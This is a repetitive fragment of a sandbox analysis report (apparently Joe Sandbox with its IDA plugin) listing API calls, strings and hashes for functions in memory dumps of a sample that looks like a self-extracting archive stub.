                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __fprintf_l_strncpy
                                                                                                                                              • String ID: $%s$@%s
                                                                                                                                              • API String ID: 1857242416-834177443
                                                                                                                                              • Opcode ID: a151be1ab1e98521d87a0743677d12e65491ae7684c1e2b9a2050534c6bd788a
                                                                                                                                              • Instruction ID: ab826f499c1377b205ff600c504fd6d4ae8835e9e999141b007d93e444b6420b
                                                                                                                                              • Opcode Fuzzy Hash: a151be1ab1e98521d87a0743677d12e65491ae7684c1e2b9a2050534c6bd788a
                                                                                                                                              • Instruction Fuzzy Hash: 3621AE724A038DAEDF21DEA5CC01FEE3BA8AB05700F940022FA1496192E371D6668B60
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 002FA0FE
                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 002FA116
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 002FA144
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                              • String ID: GETPASSWORD1
                                                                                                                                              • API String ID: 445417207-3292211884
                                                                                                                                              • Opcode ID: df4d951be5bee64a7910a35495b4ed3687c5e7129f2f85b7bfe88249627187d1
                                                                                                                                              • Instruction ID: df032a2a916bd560fd3f3bfeac022033220c67a4be7f4b469e5b7b76d6208961
                                                                                                                                              • Opcode Fuzzy Hash: df4d951be5bee64a7910a35495b4ed3687c5e7129f2f85b7bfe88249627187d1
                                                                                                                                              • Instruction Fuzzy Hash: 6411087296021D76DB219E689D49FFBB77CEB0E780F014035FB4DB2080C6A5996186A2
                                                                                                                                              APIs
                                                                                                                                              • _swprintf.LIBCMT ref: 002EB1DE
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 002EB1FC
                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 002EB20C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                              • String ID: %c:\
                                                                                                                                              • API String ID: 525462905-3142399695
                                                                                                                                              • Opcode ID: 7b43157a5c9d16ec8a31983706ff825aa7f8a0ed55ffb48d8f24fd2bc34faf17
                                                                                                                                              • Instruction ID: 6450f0ffce13d9d33cece76b79a95299f9486d9656fc94dd14897b6de4895259
                                                                                                                                              • Opcode Fuzzy Hash: 7b43157a5c9d16ec8a31983706ff825aa7f8a0ed55ffb48d8f24fd2bc34faf17
                                                                                                                                              • Instruction Fuzzy Hash: 6401F96356035365DA226F769C46D6FB7ACDE55770BD04406FD44C7082FB70D860C2B1
                                                                                                                                              APIs
                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,002EA865,00000008,00000000,?,?,002EC802,?,00000000,?,00000001,?), ref: 002F035F
                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,002EA865,00000008,00000000,?,?,002EC802,?,00000000), ref: 002F0369
                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,002EA865,00000008,00000000,?,?,002EC802,?,00000000), ref: 002F0379
                                                                                                                                              Strings
                                                                                                                                              • Thread pool initialization failed., xrefs: 002F0391
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                                                              • Opcode ID: 188d7142a876d1ab262bc53bff50e5bf38c80b1bd341886afa06c46f40c85afb
                                                                                                                                              • Instruction ID: 28b87ab43f2cb81f8aa561fcbf5e601bf8cbde1ee1f9020f54006cfadd8a8012
                                                                                                                                              • Opcode Fuzzy Hash: 188d7142a876d1ab262bc53bff50e5bf38c80b1bd341886afa06c46f40c85afb
                                                                                                                                              • Instruction Fuzzy Hash: 191173B15507099FD3215F669CC8AEBFBECEB59394F10482EF2DA82201D67119A0CB50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                              • API String ID: 0-56093855
                                                                                                                                              • Opcode ID: 61415c8b4ddf5a76d51782e08e3e5969877ea8ef7f5a9efe133fe35e7ae2fe34
                                                                                                                                              • Instruction ID: 1957d3236a5cab224b8675ac4a886dfe5171effb7d1bcaed84c8f9688005310a
                                                                                                                                              • Opcode Fuzzy Hash: 61415c8b4ddf5a76d51782e08e3e5969877ea8ef7f5a9efe133fe35e7ae2fe34
                                                                                                                                              • Instruction Fuzzy Hash: E201797252820DAFD7129F15EE40A77F7EDF74A7D1F200439F641A2230D6A19C25D751
                                                                                                                                              APIs
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 002FC8A7
                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002FC8E3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnvironmentVariable
                                                                                                                                              • String ID: sfxcmd$sfxpar
                                                                                                                                              • API String ID: 1431749950-3493335439
                                                                                                                                              • Opcode ID: f99fb1da285f8effcd908b2ee4dce7ed26d480d36c7e217630150792a152ab2b
                                                                                                                                              • Instruction ID: f02195e0861ecb67a0804de00a994472310d1642755981fec01c05753c5fa755
                                                                                                                                              • Opcode Fuzzy Hash: f99fb1da285f8effcd908b2ee4dce7ed26d480d36c7e217630150792a152ab2b
                                                                                                                                              • Instruction Fuzzy Hash: 86F0E272821229AAC7226FC19C09AFAB76C9F09791B004076FE4896102DA608860DBA0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                              • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                                                                                                                              • Instruction ID: f81bea25d5339be222d26706f776c923dc6b44c47255499e4db7608b423d562d
                                                                                                                                              • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                                                                                                                              • Instruction Fuzzy Hash: 58A16631A063869FDB23DF18C8A17BEBBA5EF15350F29416EE5C49B2C2CB348941C755
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,002E7F2C,?,?,?), ref: 002EA03C
                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,002E7F2C,?,?), ref: 002EA080
                                                                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,002E7F2C,?,?,?,?,?,?,?,?), ref: 002EA101
                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,002E7F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 002EA108
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2287278272-0
                                                                                                                                              • Opcode ID: 1ad53081e4b17e8f68cf793b49a0eaf7e5010e4f4f0832ddd9bf1b4368c8c173
                                                                                                                                              • Instruction ID: fb752ce4ad8b8e588e01a7972ed17745410532b1fb2fb76954f2c7ecac3cfaea
                                                                                                                                              • Opcode Fuzzy Hash: 1ad53081e4b17e8f68cf793b49a0eaf7e5010e4f4f0832ddd9bf1b4368c8c173
                                                                                                                                              • Instruction Fuzzy Hash: 2941F1302983C29AE731DF25DC41BEFBBE8AB89300F44091DB5D4D7181C664EA68DB63
                                                                                                                                              APIs
                                                                                                                                              • LoadBitmapW.USER32(00000065), ref: 002FA508
                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 002FA529
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 002FA551
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 002FA570
                                                                                                                                                • Part of subcall function 002F963A: FindResourceW.KERNEL32(00000066,PNG,?,?,002FA54A,00000066), ref: 002F964B
                                                                                                                                                • Part of subcall function 002F963A: SizeofResource.KERNEL32(00000000,75845780,?,?,002FA54A,00000066), ref: 002F9663
                                                                                                                                                • Part of subcall function 002F963A: LoadResource.KERNEL32(00000000,?,?,002FA54A,00000066), ref: 002F9676
                                                                                                                                                • Part of subcall function 002F963A: LockResource.KERNEL32(00000000,?,?,002FA54A,00000066), ref: 002F9681
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 142272564-0
                                                                                                                                              • Opcode ID: e2e8132280036d8f6b9cffbd4e7fbe9119d9edd51684f5b017e462b0adb12da6
                                                                                                                                              • Instruction ID: d26755730f961b0696ebc620a91398d42a1ab95940abbfb9aad39a7bd61b8c5c
                                                                                                                                              • Opcode Fuzzy Hash: e2e8132280036d8f6b9cffbd4e7fbe9119d9edd51684f5b017e462b0adb12da6
                                                                                                                                              • Instruction Fuzzy Hash: 0601F73295011D2BC71237684C46FBFF76E9B86BD1F880030BB04A7291DE118C2646A1
                                                                                                                                              APIs
                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00301AA0
                                                                                                                                                • Part of subcall function 003020D8: ___AdjustPointer.LIBCMT ref: 00302122
                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00301AB7
                                                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00301AC9
                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00301AED
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2633735394-0
                                                                                                                                              • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                                                              • Instruction ID: 96a8c2ea457f5089ea2e6a43aa155c34d68e41b25ef9f0721e860749778760cd
                                                                                                                                              • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                                                              • Instruction Fuzzy Hash: 49012532101108BBCF129F95CC11EEB7BBAFF88754F058124FE1866161D332E8A1EBA0
                                                                                                                                              APIs
                                                                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 003015E6
                                                                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 003015EB
                                                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 003015F0
                                                                                                                                                • Part of subcall function 0030268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0030269F
                                                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00301605
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• String ID:
• API String ID: 1761009282-0
• Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
• Instruction ID: f25adafe0e444e46e486d248f909fcb9d9aa2a0e9daa0715921a5270f85c3eee
• Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
• Instruction Fuzzy Hash: EFC0022800364950DC133AB5273A6AB530409A27C9B9615C5FD411E4D35A47481B1632

APIs
  • Part of subcall function 002F960F: GetDC.USER32(00000000), ref: 002F9613
  • Part of subcall function 002F960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 002F961E
  • Part of subcall function 002F960F: ReleaseDC.USER32(00000000,00000000), ref: 002F9629
• GetObjectW.GDI32(?,00000018,?), ref: 002F978E
  • Part of subcall function 002F9954: GetDC.USER32(00000000), ref: 002F995D
  • Part of subcall function 002F9954: GetObjectW.GDI32(?,00000018,?), ref: 002F998C
  • Part of subcall function 002F9954: ReleaseDC.USER32(00000000,?), ref: 002F9A20
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID: (
• API String ID: 1061551593-3887548279
• Opcode ID: 48fc52adf7e174344e39e427821b9ebe6d198607fcaf3de4f1fda3b5e11ae162
• Instruction ID: b065a553c4e76bcce231028e33b61764f4b10df2e01789fe794bf1081c8183dc
• Opcode Fuzzy Hash: 48fc52adf7e174344e39e427821b9ebe6d198607fcaf3de4f1fda3b5e11ae162
• Instruction Fuzzy Hash: 626122B1218305AFD214DF64C884E6BBBE8FF89744F10492DF699CB220D671E955CB62

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: _swprintf
• String ID: %ls$%s: %s
• API String ID: 589789837-2259941744
• Opcode ID: e41accadfb7b31693eb1585ae95d8efb9d16aa4f4eb7b5ae42bdf73359179a38
• Instruction ID: 659064c7dad79ba0a23bba81232b5cfd190caa905f8af8681c13eaf5a9119b86
• Opcode Fuzzy Hash: e41accadfb7b31693eb1585ae95d8efb9d16aa4f4eb7b5ae42bdf73359179a38
• Instruction Fuzzy Hash: 4A51C6312BC30DFAFA211A90CDC6F3AF5599B04B88F608536F78A644E7D5E169707A02

APIs
• __EH_prolog.LIBCMT ref: 002E7575
• SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002E7711
  • Part of subcall function 002EA12F: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,002E9F65,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002EA143
  • Part of subcall function 002EA12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002E9F65,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002EA174
Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: File$Attributes$H_prologTime
• String ID: :
• API String ID: 1861295151-336475711
• Opcode ID: bfe7d25d51d18f47539dac6a4d95eaaa18c9fbe13d7edbeb01568659fd0f6172
• Instruction ID: 67133ded7748a3205e2576401bd86d321c592f6a9071e4975cddfdc8f71409ed
• Opcode Fuzzy Hash: bfe7d25d51d18f47539dac6a4d95eaaa18c9fbe13d7edbeb01568659fd0f6172
• Instruction Fuzzy Hash: A841DA71894198AADB25EB66CC55EEFB37CEF45340F8040E9B505A7082DB705FA4CF61

Strings
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID:
• String ID: UNC$\\?\
• API String ID: 0-253988292
• Opcode ID: ce0356ffd8b1c4d1b1175da42cf8ee8386e0562dacdb38ceedeb0ff06ac3676c
• Instruction ID: eed0ca2ff8a0b7375eafd1d20648a704001ef6f720872839ec40954674af2bd2
• Opcode Fuzzy Hash: ce0356ffd8b1c4d1b1175da42cf8ee8386e0562dacdb38ceedeb0ff06ac3676c
• Instruction Fuzzy Hash: CB41EB354A02DA7ACF23AF63CC61EEB7769AF05351F808065F85497282E77499B0DF90

APIs
